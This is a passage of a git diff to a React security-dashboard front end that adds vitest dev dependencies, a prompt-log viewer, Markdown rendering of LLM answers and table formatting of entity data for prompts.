@@ -2543,6 +2714,16 @@
       "funding": {
         "type": "github",
         "url": "https://github.com/sponsors/wooorm"
+      }
+    },
+    "node_modules/check-error": {
+      "version": "2.1.3",
+      "resolved": "https://registry.npmjs.org/check-error/-/check-error-2.1.3.tgz",
+      "integrity": "sha512-PAJdDJusoxnwm1VwW07VWwUN1sl7smmC3OKggvndJFadxxDRyFJBX/ggnu/KE4kQAB7a3Dp8f/YXC1FlUprWmA==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">= 16"
       }
     },
     "node_modules/chownr": {
@@ -3121,6 +3302,16 @@
         "url": "https://github.com/sponsors/wooorm"
       }
     },
+    "node_modules/deep-eql": {
+      "version": "5.0.2",
+      "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-5.0.2.tgz",
+      "integrity": "sha512-h5k/5U50IJJFpzfL6nO9jaaumfjO/f2NjK/oYB2Djzm4p9L+3T9qWpZqZ2hAbLPuuYq9wrU08WQyBTL5GbPk5Q==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=6"
+      }
+    },
     "node_modules/deep-is": {
       "version": "0.1.4",
       "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz",
@@ -3237,6 +3428,13 @@
       "engines": {
         "node": ">= 0.4"
       }
+    },
+    "node_modules/es-module-lexer": {
+      "version": "1.7.0",
+      "resolved": "https://registry.npmjs.org/es-module-lexer/-/es-module-lexer-1.7.0.tgz",
+      "integrity": "sha512-jEQoCwk8hyb2AZziIOLhDqpm5+2ww5uIE6lkO/6jcOCusfk6LhMHpXXfBLXTZ7Ydyt0j4VoUQv6uGNYbdW+kBA==",
+      "dev": true,
+      "license": "MIT"
     },
     "node_modules/es-object-atoms": {
       "version": "1.1.1",
@@ -3507,6 +3705,16 @@
         "url": "https://opencollective.com/unified"
       }
     },
+    "node_modules/estree-walker": {
+      "version": "3.0.3",
+      "resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-3.0.3.tgz",
+      "integrity": "sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/estree": "^1.0.0"
+      }
+    },
     "node_modules/esutils": {
       "version": "2.0.3",
       "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz",
@@ -3515,6 +3723,16 @@
       "license": "BSD-2-Clause",
       "engines": {
         "node": ">=0.10.0"
+      }
+    },
+    "node_modules/expect-type": {
+      "version": "1.4.0",
+      "resolved": "https://registry.npmjs.org/expect-type/-/expect-type-1.4.0.tgz",
+      "integrity": "sha512-KfYbmpRm0VbLjEvVa9yGwCi9GI34xvi7A/HXYWQO65CSD2u3MczUJSuwXKFIxlGsgBQizV9q5J9NHj4VG0n+pA==",
+      "dev": true,
+      "license": "Apache-2.0",
+      "engines": {
+        "node": ">=12.0.0"
       }
     },
     "node_modules/extend": {
@@ -4491,6 +4709,13 @@
       "bin": {
         "loose-envify": "cli.js"
       }
+    },
+    "node_modules/loupe": {
+      "version": "3.2.1",
+      "resolved": "https://registry.npmjs.org/loupe/-/loupe-3.2.1.tgz",
+      "integrity": "sha512-CdzqowRJCeLU72bHvWqwRBBlLcMEtIvGrlvef74kMnV2AolS9Y8xUv1I0U/MNAWMhBlKIoyuEgoJ0t/bbwHbLQ==",
+      "dev": true,
+      "license": "MIT"
     },
     "node_modules/lru-cache": {
       "version": "5.1.1",
@@ -5612,6 +5837,23 @@
         "node": ">=8"
       }
     },
+    "node_modules/pathe": {
+      "version": "2.0.3",
+      "resolved": "https://registry.npmjs.org/pathe/-/pathe-2.0.3.tgz",
+      "integrity": "sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/pathval": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/pathval/-/pathval-2.0.1.tgz",
+      "integrity": "sha512-//nshmD55c46FuFw26xV/xFAaB5HF9Xdap7HJBBnrKdAd6/GxDBaNA1870O79+9ueg61cZLSVc+OaFlfmObYVQ==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">= 14.16"
+      }
+    },
     "node_modules/picocolors": {
       "version": "1.1.1",
       "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz",
@@ -6084,6 +6326,13 @@
         "node": ">=8"
       }
     },
+    "node_modules/siginfo": {
+      "version": "2.0.0",
+      "resolved": "https://registry.npmjs.org/siginfo/-/siginfo-2.0.0.tgz",
+      "integrity": "sha512-ybx0WO1/8bSBLEWXZvEd7gMW3Sn3JFlW3TvX1nREbDLRNQNaeNN8WK0meBwPdAaOI7TtRRRJn/Es1zhrrCHu7g==",
+      "dev": true,
+      "license": "ISC"
+    },
     "node_modules/source-map-js": {
       "version": "1.2.1",
       "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz",
@@ -6102,6 +6351,20 @@
         "type": "github",
         "url": "https://github.com/sponsors/wooorm"
       }
+    },
+    "node_modules/stackback": {
+      "version": "0.0.2",
+      "resolved": "https://registry.npmjs.org/stackback/-/stackback-0.0.2.tgz",
+      "integrity": "sha512-1XMJE5fQo1jGH6Y/7ebnwPOBEkIEnT4QF32d5R1+VXdXveM0IBMJt8zfaxX1P3QhVwrYe+576+jkANtSS2mBbw==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/std-env": {
+      "version": "3.10.0",
+      "resolved": "https://registry.npmjs.org/std-env/-/std-env-3.10.0.tgz",
+      "integrity": "sha512-5GS12FdOZNliM5mAOxFRg7Ir0pWz8MdpYm6AY6VPkGpbA7ZzmbzNcBJQ0GPvvyWgcY7QAhCgf9Uy89I03faLkg==",
+      "dev": true,
+      "license": "MIT"
     },
     "node_modules/stringify-entities": {
       "version": "4.0.4",
@@ -6129,6 +6392,26 @@
       "funding": {
         "url": "https://github.com/sponsors/sindresorhus"
       }
+    },
+    "node_modules/strip-literal": {
+      "version": "3.1.0",
+      "resolved": "https://registry.npmjs.org/strip-literal/-/strip-literal-3.1.0.tgz",
+      "integrity": "sha512-8r3mkIM/2+PpjHoOtiAW8Rg3jJLHaV7xPwG+YRGrv6FP0wwk/toTpATxWYOW0BKdWwl82VT2tFYi5DlROa0Mxg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "js-tokens": "^9.0.1"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/antfu"
+      }
+    },
+    "node_modules/strip-literal/node_modules/js-tokens": {
+      "version": "9.0.1",
+      "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-9.0.1.tgz",
+      "integrity": "sha512-mxa9E9ITFOt0ban3j6L5MpjwegGz6lBQmM1IJkWeBZGcMxto50+eWdjC/52xDbS2vy0k7vIMK0Fe2wfL9OQSpQ==",
+      "dev": true,
+      "license": "MIT"
     },
     "node_modules/style-to-js": {
       "version": "1.1.21",
@@ -6211,6 +6494,20 @@
         "utrie": "^1.0.2"
       }
     },
+    "node_modules/tinybench": {
+      "version": "2.9.0",
+      "resolved": "https://registry.npmjs.org/tinybench/-/tinybench-2.9.0.tgz",
+      "integrity": "sha512-0+DUvqWMValLmha6lr4kD8iAMK1HzV0/aKnCtWb9v9641TnP/MFb7Pc2bxoxQjTXAErryXVgUOfv2YqNllqGeg==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/tinyexec": {
+      "version": "0.3.2",
+      "resolved": "https://registry.npmjs.org/tinyexec/-/tinyexec-0.3.2.tgz",
+      "integrity": "sha512-KQQR9yN7R5+OSwaK0XQoj22pwHoTlgYqmUscPYoknOoWCWfj/5/ABTMRi69FrKU5ffPVh5QcFikpWJI/P1ocHA==",
+      "dev": true,
+      "license": "MIT"
+    },
     "node_modules/tinyglobby": {
       "version": "0.2.14",
       "resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.14.tgz",
@@ -6251,6 +6548,36 @@
       },
       "funding": {
         "url": "https://github.com/sponsors/jonschlinkert"
+      }
+    },
+    "node_modules/tinypool": {
+      "version": "1.1.1",
+      "resolved": "https://registry.npmjs.org/tinypool/-/tinypool-1.1.1.tgz",
+      "integrity": "sha512-Zba82s87IFq9A9XmjiX5uZA/ARWDrB03OHlq+Vw1fSdt0I+4/Kutwy8BP4Y/y/aORMo61FQ0vIb5j44vSo5Pkg==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": "^18.0.0 || >=20.0.0"
+      }
+    },
+    "node_modules/tinyrainbow": {
+      "version": "2.0.0",
+      "resolved": "https://registry.npmjs.org/tinyrainbow/-/tinyrainbow-2.0.0.tgz",
+      "integrity": "sha512-op4nsTR47R6p0vMUUoYl/a+ljLFVtlfaXkLQmqfLR1qHma1h/ysYk4hEXZ880bf2CYgTskvTa/e196Vd5dDQXw==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=14.0.0"
+      }
+    },
+    "node_modules/tinyspy": {
+      "version": "4.0.4",
+      "resolved": "https://registry.npmjs.org/tinyspy/-/tinyspy-4.0.4.tgz",
+      "integrity": "sha512-azl+t0z7pw/z958Gy9svOTuzqIk6xq+NSheJzn5MMWtWTFywIacg2wUlzKFGtt3cthx0r2SxMK0yzJOR0IES7Q==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=14.0.0"
       }
     },
     "node_modules/to-regex-range": {
@@ -6613,6 +6940,29 @@
         }
       }
     },
+    "node_modules/vite-node": {
+      "version": "3.2.4",
+      "resolved": "https://registry.npmjs.org/vite-node/-/vite-node-3.2.4.tgz",
+      "integrity": "sha512-EbKSKh+bh1E1IFxeO0pg1n4dvoOTt0UDiXMd/qn++r98+jPO1xtJilvXldeuQ8giIB5IkpjCgMleHMNEsGH6pg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "cac": "^6.7.14",
+        "debug": "^4.4.1",
+        "es-module-lexer": "^1.7.0",
+        "pathe": "^2.0.3",
+        "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0"
+      },
+      "bin": {
+        "vite-node": "vite-node.mjs"
+      },
+      "engines": {
+        "node": "^18.0.0 || ^20.0.0 || >=22.0.0"
+      },
+      "funding": {
+        "url": "https://opencollective.com/vitest"
+      }
+    },
     "node_modules/vite-plugin-mkcert": {
       "version": "1.17.8",
       "resolved": "https://registry.npmjs.org/vite-plugin-mkcert/-/vite-plugin-mkcert-1.17.8.tgz",
@@ -6656,6 +7006,92 @@
         "url": "https://github.com/sponsors/jonschlinkert"
       }
     },
+    "node_modules/vitest": {
+      "version": "3.2.7",
+      "resolved": "https://registry.npmjs.org/vitest/-/vitest-3.2.7.tgz",
+      "integrity": "sha512-KrxIJ62Fd89gfysR4WotlgZABiz2dqFPgqGzX7s+CwsqLFomRH7777ZcrOD6+WVAh7khPQP41A+BKbpcJFrdEg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/chai": "^5.2.2",
+        "@vitest/expect": "3.2.7",
+        "@vitest/mocker": "3.2.7",
+        "@vitest/pretty-format": "^3.2.7",
+        "@vitest/runner": "3.2.7",
+        "@vitest/snapshot": "3.2.7",
+        "@vitest/spy": "3.2.7",
+        "@vitest/utils": "3.2.7",
+        "chai": "^5.2.0",
+        "debug": "^4.4.1",
+        "expect-type": "^1.2.1",
+        "magic-string": "^0.30.17",
+        "pathe": "^2.0.3",
+        "picomatch": "^4.0.2",
+        "std-env": "^3.9.0",
+        "tinybench": "^2.9.0",
+        "tinyexec": "^0.3.2",
+        "tinyglobby": "^0.2.14",
+        "tinypool": "^1.1.1",
+        "tinyrainbow": "^2.0.0",
+        "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0",
+        "vite-node": "3.2.4",
+        "why-is-node-running": "^2.3.0"
+      },
+      "bin": {
+        "vitest": "vitest.mjs"
+      },
+      "engines": {
+        "node": "^18.0.0 || ^20.0.0 || >=22.0.0"
+      },
+      "funding": {
+        "url": "https://opencollective.com/vitest"
+      },
+      "peerDependencies": {
+        "@edge-runtime/vm": "*",
+        "@types/debug": "^4.1.12",
+        "@types/node": "^18.0.0 || ^20.0.0 || >=22.0.0",
+        "@vitest/browser": "3.2.7",
+        "@vitest/ui": "3.2.7",
+        "happy-dom": "*",
+        "jsdom": "*"
+      },
+      "peerDependenciesMeta": {
+        "@edge-runtime/vm": {
+          "optional": true
+        },
+        "@types/debug": {
+          "optional": true
+        },
+        "@types/node": {
+          "optional": true
+        },
+        "@vitest/browser": {
+          "optional": true
+        },
+        "@vitest/ui": {
+          "optional": true
+        },
+        "happy-dom": {
+          "optional": true
+        },
+        "jsdom": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/vitest/node_modules/picomatch": {
+      "version": "4.0.5",
+      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.5.tgz",
+      "integrity": "sha512-RvwwcruNjI1ncT5xRakeyS9Lf8lcItv34KD+aif+VH9kduAyfYBipGh12274xtenIPZ119/R9BdTBa8gAwSh0A==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=12"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/jonschlinkert"
+      }
+    },
     "node_modules/which": {
       "version": "2.0.2",
       "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz",
@@ -6670,6 +7106,23 @@
       },
       "engines": {
         "node": ">= 8"
+      }
+    },
+    "node_modules/why-is-node-running": {
+      "version": "2.3.0",
+      "resolved": "https://registry.npmjs.org/why-is-node-running/-/why-is-node-running-2.3.0.tgz",
+      "integrity": "sha512-hUrmaWBdVDcxvYqnyh09zunKzROWjbZTiNy8dBEjkS7ehEDQibXJ7XvlmtbwuTclUiIyN+CyXQD4Vmko8fNm8w==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "siginfo": "^2.0.0",
+        "stackback": "0.0.2"
+      },
+      "bin": {
+        "why-is-node-running": "cli.js"
+      },
+      "engines": {
+        "node": ">=8"
       }
     },
     "node_modules/word-wrap": {

--- a/protostar-react/package.json
+++ b/protostar-react/package.json
@@ -8,7 +8,9 @@
     "build": "tsc -b && vite build",
     "lint": "eslint .",
     "preview": "vite preview",
-    "build:ignore-errors": "cross-env CI=false DISABLE_ESLINT_PLUGIN=true vite build"
+    "build:ignore-errors": "cross-env CI=false DISABLE_ESLINT_PLUGIN=true vite build",
+    "test": "vitest run",
+    "test:watch": "vitest"
   },
   "dependencies": {
     "@reduxjs/toolkit": "^2.6.0",
@@ -41,6 +43,7 @@
     "globals": "^15.14.0",
     "typescript": "~5.6.2",
     "typescript-eslint": "^8.18.2",
-    "vite": "^6.4.3"
+    "vite": "^6.4.3",
+    "vitest": "^3.2.7"
   }
 }

--- a/protostar-react/src/components/Menu.tsx
+++ b/protostar-react/src/components/Menu.tsx
@@ -36,7 +36,7 @@ export function Menu()
     { id: 5, label: 'Gamma Signals', link: '/view5', element: <View5 /> },
     { id: 2, label: 'Detail View', link: '/entity', element: <EntityDash /> },
     { id: 3, label: 'Global View', link: '/everything', element: <EverythingDash/> },
-    { id: 6, label: 'Chain Reactions', link: '/view6', element: <View6 /> },
+    { id: 6, label: 'R Process', link: '/view6', element: <View6 /> },
     { id: 7, label: 'Isotopes', link: '/view7', element: <View7 /> },
   ];
 

--- a/protostar-react/src/config/config.tsx
+++ b/protostar-react/src/config/config.tsx
@@ -64,6 +64,11 @@ export default class Config
     return this.baseUrl + '/corazalog';
   }
 
+  public PromptLogURL()
+  {
+    return this.baseUrl + '/promptlog';
+  }
+
   public ConnectionStatusURL()
   {
     return this.baseUrl + '/connectionstatus';

--- a/protostar-react/src/pages/Alerts.tsx
+++ b/protostar-react/src/pages/Alerts.tsx
@@ -176,7 +176,7 @@ export function Alerts()
   {
     const key = alertKey(alert, index);
     setExplainingIndex(index);
-    const finalPrompt = ps.AlertSummaryPrompt(visibleAlerts, alert);
+    const finalPrompt = ps.AlertSummaryPrompt(alert);
     const output = await llm.AskLLM(finalPrompt);
     setExplanations((current) => ({ ...current, [key]: output || 'The AI request failed. Please try again.' }));
     setVisibleExplanations((current) => ({ ...current, [key]: true }));

--- a/protostar-react/src/pages/CaseDetails.tsx
+++ b/protostar-react/src/pages/CaseDetails.tsx
@@ -118,7 +118,7 @@ export function CaseDetails({ selected, setSelected, appService, telemetryServic
                     <div className="bg-[#1B1B1B] mt-4">
                       <div className="border border-gray-600 rounded-lg p-2 space-y-1">
                         {comments.map((item, index) => (
-                          <li key={index} className="text-white cursor-pointer px-4 py-2 hover:bg-gray-700 list-none">
+                          <li key={index} className="text-white px-4 py-2 list-none">
                             <span className={`mx-1 font-semibold ${item.f1 == 'agent' ? 'text-purple-400' : 'text-teal-400'} `}>{item.f1}</span>
                             <span className="mx-1 text-xs">{item.f3}</span>
                             <div className="mx-1 mt-1 markdown-content">

--- a/protostar-react/src/pages/Details.tsx
+++ b/protostar-react/src/pages/Details.tsx
@@ -1,8 +1,10 @@
 import { createBrowserRouter, data, RouterProvider, useNavigate } from "react-router-dom";
-import React, { useState, useEffect, useRef } from 'react';
+import { useState, useEffect, useRef } from 'react';
 import { useSelector } from "react-redux";
+import ReactMarkdown from 'react-markdown';
+import remarkGfm from 'remark-gfm';
 import LLMService from '../services/LLMService.ts';
-import PromptService from "../services/PromptService.ts";
+import PromptService, { FormatColumnTable } from "../services/PromptService.ts";
 import TelemetryService from "../services/TelemetryService.ts";
 import { X, Plus, ChevronDown } from 'lucide-react';
 import HelpTextService from "../services/HelpTextService.ts";
@@ -121,7 +123,7 @@ export function Details()
             <div className="flex-row">
               <button title={`${hts.AISummaryHelpText()}`} onClick={async () => 
                   {
-                    let jsonEntityDetails = JSON.stringify(entityDetails);
+                    let jsonEntityDetails = FormatColumnTable(entityFields, entityDetails);
                     let summaryPrompt = ps.DetailsSummaryPrompt(jsonEntityDetails);
                     let answer = await llm.AskLLM(summaryPrompt);
                     setLLMOutput(answer || LLM_ERROR_MESSAGE);
@@ -294,7 +296,7 @@ export function Details()
                 <button title={`${hts.AskAIHelpText()}`} onClick=
                 {async () => 
                   {
-                    let jsonEntityDetails = JSON.stringify(entityDetails);
+                    let jsonEntityDetails = FormatColumnTable(entityFields, entityDetails);
                     let finalPrompt = ps.DetailsPrompt(llmQuestion, jsonEntityDetails);
                     let answer = await llm.AskLLM(finalPrompt);
                     setLLMOutput(answer || LLM_ERROR_MESSAGE);
@@ -304,11 +306,11 @@ export function Details()
             </div>
             <div className="mb-24">
               <label className="block text-gray-400 font-bold text-xl mb-2 my-4">Output</label>
-              <p className="overflow-visible">
-                <textarea readOnly={true} value={llmOutput} placeholder="The AI answer will appear here" style={{
-                    '--base-size': `${llmOutput.length/80}rem`
-                  } as React.CSSProperties} className="bg-[#1B1B1B] calculated-textarea-height text-gray-200 border-gray-300 overflow-y-auto cursor-default my-3 shadow resize-none appearance-none border rounded w-full py-2 px-3 leading-tight focus:outline-none focus:shadow-outline h-150" />
-              </p>
+              <div className="bg-[#1B1B1B] text-gray-200 border border-gray-300 rounded w-full py-2 px-3 my-3 shadow leading-tight markdown-content">
+                {llmOutput
+                  ? <ReactMarkdown remarkPlugins={[remarkGfm]}>{llmOutput}</ReactMarkdown>
+                  : <p className="text-gray-500">The AI answer will appear here</p>}
+              </div>
             </div>
           </div>
         </div>

--- a/protostar-react/src/pages/Home.tsx
+++ b/protostar-react/src/pages/Home.tsx
@@ -2,7 +2,7 @@ import { useState, useEffect, useRef } from 'react';
 import ReactMarkdown from 'react-markdown';
 import remarkGfm from 'remark-gfm';
 import LLMService from '../services/LLMService.ts';
-import PromptService from "../services/PromptService.ts";
+import PromptService, { FormatEntityTable, HIGH_LEVEL_FIELD_NAMES } from "../services/PromptService.ts";
 import TelemetryService from "../services/TelemetryService.ts";
 
 // the backend returns an empty answer when the LLM call fails (see api.log for the cause)
@@ -31,7 +31,7 @@ export function Home()
       let entityType = String(node.entity_type).trim();
       let ip = (String(node.ip).trim() == "" ? "-" : String(node.ip).trim());
       let atomicWeight = (node.atomic_weight === null || node.atomic_weight === undefined ? "-" : String(node.atomic_weight));
-      let atomicMass = (node.count === null || node.count === undefined ? "-" : String(node.count));
+      let atomicMass = (node.atomic_mass === null || node.atomic_mass === undefined ? "-" : String(node.atomic_mass));
       let updatedEntry = [entity, entityType, ip, atomicWeight, atomicMass];
       return updatedEntry;
     }
@@ -47,7 +47,7 @@ export function Home()
         highLevel.add(updatedEntry.toString());
         midLevelData.push(updatedEntry);
       });
-      let highLevelDataFieldsList = ['Entity', 'Entity Type', 'Ip', 'Atomic Weight', 'Atomic Mass'];
+      let highLevelDataFieldsList = [...HIGH_LEVEL_FIELD_NAMES];
       let highLevelDataList = Array.from(highLevel, h => h.split(','));
       let visibility = [];
 
@@ -60,10 +60,9 @@ export function Home()
         }
       }
       setHighLevelDataFieldVisibility(visibility);
-      highLevelDataList.concat(highLevelDataFieldsList);
       setHighLevelData(highLevelDataList);
       setHighLevelDataFields(highLevelDataFieldsList);
-      let firstOutput = await llm.AskLLM(ps.ThreatStatusSummaryPrompt(highLevelDataList));
+      let firstOutput = await llm.AskLLM(ps.ThreatStatusSummaryPrompt(FormatEntityTable(highLevelDataList)));
       if(!firstOutput)
       {
         // only cache real answers: a cached empty string would leave the summary blank forever
@@ -100,8 +99,8 @@ export function Home()
          </h1>
         <div className='mt-4 flex-1'>
         <h1 className="text-2xl font-bold mt-4">Situation Report:</h1>
-          <h1><br></br>The latest AI analysis and recomendations will appear below. The summary includes a high level overview of the
-            open threat detection elemets, the type of entity in each detecton element, and overall reccomendations. </h1>
+          <h1><br></br>The latest AI analysis and recommendations will appear below. The summary includes a high level overview of the
+            open threat detection elements, the type of entity in each detection element, and overall recommendations. </h1>
           <div className="mt-4">
             <div className="bg-[#1B1B1B] w-full text-gray-200 border border-gray-300 rounded py-2 px-3 my-3 shadow leading-tight markdown-content">
               {tacticalSummary

--- a/protostar-react/src/pages/Settings.tsx
+++ b/protostar-react/src/pages/Settings.tsx
@@ -28,7 +28,7 @@ function ConnectionCard({ name, status, connectedLabel = 'Connected', disconnect
 export function Settings()
 {
   const [lineLimit, setLineLimit] = useState(40);
-  const [logSource, setLogSource] = useState<'api' | 'coraza'>('api');
+  const [logSource, setLogSource] = useState<'api' | 'coraza' | 'prompts'>('api');
   const [logText, setLogText] = useState('');
   const [lineCount, setLineCount] = useState(0);
   const [isLoading, setIsLoading] = useState(true);
@@ -92,7 +92,9 @@ export function Settings()
     {
       const config = new Config();
       const token = localStorage.getItem('token');
-      const logUrl = logSource === 'coraza' ? config.CorazaLogURL() : config.ApiLogURL();
+      const logUrl = logSource === 'coraza' ? config.CorazaLogURL()
+        : logSource === 'prompts' ? config.PromptLogURL()
+        : config.ApiLogURL();
       const response = await axios.get(logUrl,
       {
         params: { lines: lineLimit },
@@ -149,8 +151,12 @@ export function Settings()
               className={`px-3 py-1 rounded-md border text-sm cursor-pointer ${logSource === 'coraza' ? 'bg-white text-black border-white' : 'bg-black text-white border-gray-500 hover:bg-gray-700'}`}>
               WAF Log
             </button>
+            <button type="button" onClick={() => setLogSource('prompts')}
+              className={`px-3 py-1 rounded-md border text-sm cursor-pointer ${logSource === 'prompts' ? 'bg-white text-black border-white' : 'bg-black text-white border-gray-500 hover:bg-gray-700'}`}>
+              Prompt Log
+            </button>
           </div>
-          <h2 className="text-3xl font-bold">{logSource === 'coraza' ? 'WAF Audit Log' : 'API Log'}</h2>
+          <h2 className="text-3xl font-bold">{logSource === 'coraza' ? 'WAF Audit Log' : logSource === 'prompts' ? 'Prompt Log' : 'API Log'}</h2>
           <p className="text-sm text-gray-400 mt-1">
             Showing {lineCount} line(s)
             {lastUpdated && ` - Updated ${lastUpdated.toLocaleTimeString()}`}
@@ -183,7 +189,7 @@ export function Settings()
 
       <pre
         aria-label={logSource === 'coraza' ? 'WAF audit log contents' : 'API log contents'}
-        className={`bg-[#111111] border border-gray-700 rounded-lg p-4 h-[calc(100vh-12rem)] overflow-auto text-xs leading-5 text-gray-200 font-mono ${logSource === 'coraza' ? 'whitespace-pre-wrap break-words' : 'whitespace-pre'}`}>
+        className={`bg-[#111111] border border-gray-700 rounded-lg p-4 h-[calc(100vh-12rem)] overflow-auto text-xs leading-5 text-gray-200 font-mono ${logSource === 'api' ? 'whitespace-pre' : 'whitespace-pre-wrap break-words'}`}>
         {isLoading && !logText
           ? 'Loading log...'
           : (logText || (logSource === 'coraza'

--- a/protostar-react/src/pages/Summary.tsx
+++ b/protostar-react/src/pages/Summary.tsx
@@ -1,10 +1,12 @@
 import { useNavigate } from "react-router-dom";
 import { useState, useEffect, useRef } from 'react';
+import ReactMarkdown from 'react-markdown';
+import remarkGfm from 'remark-gfm';
 import LLMService from '../services/LLMService.ts';
 import { useDispatch } from 'react-redux';
 import { setData } from "../other/DataManagement.ts";
 import { X, Plus, ChevronDown } from 'lucide-react';
-import PromptService from "../services/PromptService.ts";
+import PromptService, { FormatEntityTable, HIGH_LEVEL_FIELD_NAMES } from "../services/PromptService.ts";
 import TelemetryService from "../services/TelemetryService.ts";
 import HelpTextService from "../services/HelpTextService.ts";
 
@@ -43,7 +45,7 @@ export function Summary()
       let entityType = String(node.entity_type).trim();
       let ip = (String(node.ip).trim() == "" ? "-" : String(node.ip).trim());
       let atomicWeight = (node.atomic_weight === null || node.atomic_weight === undefined ? "-" : String(node.atomic_weight));
-      let atomicMass = (node.count === null || node.count === undefined ? "-" : String(node.count));
+      let atomicMass = (node.atomic_mass === null || node.atomic_mass === undefined ? "-" : String(node.atomic_mass));
       let updatedEntry = [entity, entityType, ip, atomicWeight, atomicMass];
       return updatedEntry;
     }
@@ -60,7 +62,7 @@ export function Summary()
         highLevel.add(updatedEntry.toString());
         midLevelData.push(updatedEntry);
       });
-      let highLevelDataFieldsList = ['Entity', 'Entity Type', 'Ip', 'Atomic Weight', 'Atomic Mass'];
+      let highLevelDataFieldsList = [...HIGH_LEVEL_FIELD_NAMES];
       let highLevelDataList = Array.from(highLevel, h => h.split(','));
       // Sort by score: atomic weight (element number) descending, atomic mass as tiebreaker
       highLevelDataList.sort((a, b) =>
@@ -81,7 +83,6 @@ export function Summary()
         visibility.push(true);
       }
       setHighLevelDataFieldVisibility(visibility);
-      highLevelDataList.concat(highLevelDataFieldsList);
       setHighLevelData(highLevelDataList);
       setHighLevelDataFields(highLevelDataFieldsList);
       let output = localStorage.getItem('threatstatussummary');
@@ -92,7 +93,7 @@ export function Summary()
       else
       {
         // use the freshly built list: the highLevelData state is still empty inside this closure
-        let finalPrompt = ps.ThreatStatusSummaryPrompt(highLevelDataList);
+        let finalPrompt = ps.ThreatStatusSummaryPrompt(FormatEntityTable(highLevelDataList));
         let answer:string = await llm.AskLLM(finalPrompt);
         if(answer)
         {
@@ -192,7 +193,7 @@ export function Summary()
             <button title={`${hts.AISummaryHelpText()}`} onClick=
               {async () =>
                 {
-                  let finalPrompt = ps.ThreatStatusSummaryPrompt(highLevelData);
+                  let finalPrompt = ps.ThreatStatusSummaryPrompt(FormatEntityTable(highLevelData));
                   let answer = await llm.AskLLM(finalPrompt);
                   setLLMOutput(answer || LLM_ERROR_MESSAGE);
                 }
@@ -223,10 +224,17 @@ export function Summary()
                           textColor = 'text-blue-400';
                         }
                         
-                        // Check for red coloring logic: atomic weight cells look like "Helium (2)", extract the number
+                        // Atomic weight cells look like "Helium (2)": extract the number and band it.
+                        // Above 100 is red, 50-99 is yellow, anything else keeps the default.
                         for(let i = 0; i <= 4; i++) {
-                          if((originalIndex - i > 4) && ((originalIndex - i) % 5 === 0) && (parseInt(String(highLevelDataFields[originalIndex - i + 3]).replace(/[^0-9]/g, ''), 10) > 100)) {
-                            textColor = 'text-red-400';
+                          if((originalIndex - i > 4) && ((originalIndex - i) % 5 === 0)) {
+                            const atomicWeight = parseInt(String(highLevelDataFields[originalIndex - i + 3]).replace(/[^0-9]/g, ''), 10);
+                            if(atomicWeight > 100) {
+                              textColor = 'text-red-400';
+                            }
+                            else if(atomicWeight >= 50 && atomicWeight <= 99) {
+                              textColor = 'text-yellow-400';
+                            }
                           }
                         }
                         
@@ -356,7 +364,7 @@ export function Summary()
                 <button title={`${hts.AskAIHelpText()}`} onClick=
                 {async() => 
                   {
-                    let finalPrompt = ps.ThreatStatusPrompt(llmQuestion, highLevelData);
+                    let finalPrompt = ps.ThreatStatusPrompt(llmQuestion, FormatEntityTable(highLevelData));
                     let answer = await llm.AskLLM(finalPrompt);
                     setLLMOutput(answer || LLM_ERROR_MESSAGE);
                   }
@@ -365,12 +373,11 @@ export function Summary()
             </div>
             <div className="mb-24">
               <label className="block text-gray-400 font-bold text-xl mb-2 my-4">Output</label>
-              <p className="overflow-visible">
-                {/* <span className="bg-[#1B1B1B] h-fit text-gray-200 border-gray-300 overflow-y-auto cursor-default my-3 shadow resize-none appearance-none border-x rounded w-full py-2 px-3 leading-tight focus:outline-none focus:shadow-outline">{llmOutput}</span> */}
-                <textarea readOnly={true} value={llmOutput} placeholder="The AI answer will appear here" style={{
-                  '--base-size': `${llmOutput.length/70}rem`
-                } as React.CSSProperties} className={`bg-[#1B1B1B] calculated-textarea-height text-gray-200 border-gray-300 overflow-y-auto cursor-default my-3 shadow resize-none appearance-none border rounded w-full py-2 px-3 leading-tight focus:outline-none focus:shadow-outline`} />
-              </p>
+              <div className="bg-[#1B1B1B] text-gray-200 border border-gray-300 rounded w-full py-2 px-3 my-3 shadow leading-tight markdown-content">
+                {llmOutput
